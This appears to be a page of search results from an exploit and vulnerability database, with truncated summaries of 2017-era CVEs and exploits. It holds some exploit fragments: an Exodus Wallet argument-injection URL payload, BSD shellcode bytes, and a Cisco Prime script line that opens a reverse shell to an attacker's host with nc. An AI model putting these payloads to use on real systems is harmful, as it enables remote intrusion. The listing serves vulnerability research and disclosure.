2659 matches found
CVE-2017-17424
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Quest NetVault Backup 11.3.0.12. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of NVBUScheduleSet Get method requests. The issue results...
Exodus Wallet (ElectronJS Framework) Remote Code Execution
window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...
Exodus Wallet (ElectronJS Framework) - Remote Code Execution
Exodus Wallet ElectronJS Framework - Remote Code Execution window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...
GitStack 2.3.10 - Remote Code Execution
GitStack 2.3.10 - Remote Code Execution Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution Date: 18.01.2018 Software Link: https://gitstack.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description...
GitStack 2.3.10 Remote Code Execution
Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution Date: 18.01.2018 Software Link: https://gitstack.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description $SERVER'PHPAUTHPW' is directly passed t...
BSD/x86 - setreuid(geteuid(), geteuid()) + execve(/bin/sh) Shellcode (36 bytes)
/ bsd/x86 setreuid/exec shellcode setreuidgeteuid, geteuid and execve"/bin/sh", "/bin/sh", 0 shellcode based on hkpco's setreuid/exec shellcode for linux Tested on FreeBSD / include include char shellcode = "\x31\xc0\xb0\x19\x50\xcd\x80\x50" "\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuidgeteuid,...
Advantech WebAccess webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2780 IOCTL in the webvrpcs process. The issue results...
Command Injection
fs-git is vulnerable to command injection attacks. These attacks are possible because the buildCommand function doesn't sanitize data before constructing exec strings, allowing attackers to insert and execute commands...
CVE-2017-1000451
fs-git is a file system like api for git repository. The fs-git version 1.0.1 module relies on childprocess.exec, however, the buildCommand method used to construct exec strings does not properly sanitize data and is vulnerable to command injection across all methods that use it and call exec...
ownCloud: OS Command Injection via tainted PATH environment variable in findBinaryPath
The PATH environment variable is passed to the find command in owncloud/core/blob/master/lib/private/legacy/helper.php on line 543 is not sanitized for input. If an adversary is able to taint the PATH environment variable, OS command execution is possible utilizing the find command's execute -exe...
Out-of-bounds
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service out-of-bounds read via a crafted app...
UBUNTU-CVE-2017-17533
DISPUTED default.tcl in Tkabber 1.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has indicated that the attack cannot occur...
CVE-2017-17533
default.tcl in Tkabber 1.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has indicated that the attack cannot occur because of th...
OSX Meterpreter, Reverse HTTP Inline
Run the Meterpreter / Mettle server payload stageless This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generatemettlepayloads.rb module MetasploitModule CachedSize = 815032 include...
Microsoft Office - OLE Remote Code Execution Exploit
Exploit for windows platform in category remote exploits Source: https://github.com/embedi/CVE-2017-11882 CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research:...
CVE-2017-0834
A remote code execution vulnerability in the Android media framework libmpeg2. Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63125953...
CVE-2017-10948
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.2.1.6871. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the...
Unauthenticated Remote Code Execution Vulnerability
Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby 1.9.3 or later, allows remote attackers to execute arbitrary code via vectors related to "serialized attributes."...
DiskBoss Enterprise 8.4.16 - Local Buffer Overflow
DiskBoss Enterprise 8.4.16 - Local Buffer Overflow !/usr/bin/python ======================================================================================================================== Exploit Author: C4t0ps1s Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer OverflowCode execution Date...
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...